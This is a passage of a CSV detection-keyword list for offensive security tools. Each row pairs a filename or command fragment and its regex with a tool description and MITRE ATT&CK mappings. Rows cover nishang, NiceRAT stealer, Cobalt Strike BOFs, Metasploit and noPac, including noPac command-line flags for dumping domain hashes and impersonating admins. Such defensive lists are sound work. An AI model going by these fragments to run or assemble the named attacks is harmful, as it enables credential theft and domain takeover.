TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*nirsoft.net/utils/browsing_history_view.html*",".{0,1000}nirsoft\.net\/utils\/browsing_history_view\.html.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*nishang.exe*",".{0,1000}nishang\.exe.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*nishang.ps1*",".{0,1000}nishang\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*nishang.psm1*",".{0,1000}nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Nishang.psm1*",".{0,1000}Nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*nishang.psm1*",".{0,1000}nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*nishang-0-3-4.html*",".{0,1000}nishang\-0\-3\-4\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Nishang-all-in-one*",".{0,1000}Nishang\-all\-in\-one.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*NixImports by dr4k0nia*",".{0,1000}NixImports\sby\sdr4k0nia.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.csproj*",".{0,1000}NixImports\.csproj.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" 
"*NixImports.exe*",".{0,1000}NixImports\.exe.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.git*",".{0,1000}NixImports\.git.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.sln*",".{0,1000}NixImports\.sln.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*nkbihfbeogaeaoehlefnkodbefgpgknn*",".{0,1000}nkbihfbeogaeaoehlefnkodbefgpgknn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*nkddgncdjgjfcddamfgcmfnlhccnimig*",".{0,1000}nkddgncdjgjfcddamfgcmfnlhccnimig.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*nlbmnnijcnlegkjjpcfjclmcfggfefdm*",".{0,1000}nlbmnnijcnlegkjjpcfjclmcfggfefdm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*nmake inject_local *",".{0,1000}nmake\sinject_local\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*nmap *--script *",".{0,1000}nmap\s.{0,1000}\-\-script\s.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nmap/ncrack*",".{0,1000}nmap\/ncrack.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" 
"*nmap_port_scanner.py*",".{0,1000}nmap_port_scanner\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*nmap_port_scanner_ip_obj.py*",".{0,1000}nmap_port_scanner_ip_obj\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*nmap_smb_scan_custom_*.txt*",".{0,1000}nmap_smb_scan_custom_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*nmapAnswerMachine.py*",".{0,1000}nmapAnswerMachine\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*nmap-reverse-lookup*",".{0,1000}nmap\-reverse\-lookup.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*",".{0,1000}nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. 
This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*No credentials supplied* looking for null session shares!*",".{0,1000}No\scredentials\ssupplied.{0,1000}\slooking\sfor\snull\ssession\sshares!.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*no Mimik@tz - loaded successfully*",".{0,1000}no\sMimik\@tz\s\-\sloaded\ssuccessfully.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*No sandbox-indicative DLLs were discovered loaded in any accessible running process*",".{0,1000}No\ssandbox\-indicative\sDLLs\swere\sdiscovered\sloaded\sin\sany\saccessible\srunning\sprocess.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*No unixUserPassword 
Found*",".{0,1000}No\sunixUserPassword\sFound.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*no_session_payload.rb*",".{0,1000}no_session_payload\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NoApiUser.exe*",".{0,1000}NoApiUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*noclient: failed to execute %s: %s*",".{0,1000}noclient\:\sfailed\sto\sexecute\s\%s\:\s\%s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - 
T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*noconsolation /tmp/*",".{0,1000}noconsolation\s\/tmp\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*noconsolation --local *cmd.exe*",".{0,1000}noconsolation\s\-\-local\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*noconsolation --local *powershell.exe*",".{0,1000}noconsolation\s\-\-local\s.{0,1000}powershell\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*No-Consolation.cna*",".{0,1000}No\-Consolation\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*NoConsolation.x64.o*",".{0,1000}NoConsolation\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*NoConsolation.x86.o*",".{0,1000}NoConsolation\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*No-Consolation-main*",".{0,1000}No\-Consolation\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*node stealer.js *",".{0,1000}node\sstealer\.js\s.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*NoFault\NoFault.*",".{0,1000}NoFault\\NoFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows 
Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*NoFilter.exe *",".{0,1000}NoFilter\.exe\s.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*NoFilter-main.zip*",".{0,1000}NoFilter\-main\.zip.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*nop_shellcode.bin*",".{0,1000}nop_shellcode\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*noPac * -dc-ip * --impersonate *",".{0,1000}noPac\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-\-impersonate\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*noPac.* -create-child*",".{0,1000}noPac\..{0,1000}\s\-create\-child.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -dc-host *",".{0,1000}noPac\..{0,1000}\s\-dc\-host\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -dc-ip *",".{0,1000}noPac\..{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - 
T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -domain-netbios*",".{0,1000}noPac\..{0,1000}\s\-domain\-netbios.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -dump*",".{0,1000}noPac\..{0,1000}\s\-dump.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -hashes *",".{0,1000}noPac\..{0,1000}\s\-hashes\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* --impersonate *",".{0,1000}noPac\..{0,1000}\s\-\-impersonate\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -just-dc-ntlm*",".{0,1000}noPac\..{0,1000}\s\-just\-dc\-ntlm.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain 
user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -just-dc-user *",".{0,1000}noPac\..{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -new-name *",".{0,1000}noPac\..{0,1000}\s\-new\-name\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -no-add *",".{0,1000}noPac\..{0,1000}\s\-no\-add\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -pwd-last-set*",".{0,1000}noPac\..{0,1000}\s\-pwd\-last\-set.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -service-name *",".{0,1000}noPac\..{0,1000}\s\-service\-name\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to 
impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -shell*",".{0,1000}noPac\..{0,1000}\s\-shell.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -shell-type *",".{0,1000}noPac\..{0,1000}\s\-shell\-type\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -use-ldap*",".{0,1000}noPac\..{0,1000}\s\-use\-ldap.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.csproj*",".{0,1000}noPac\.csproj.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation 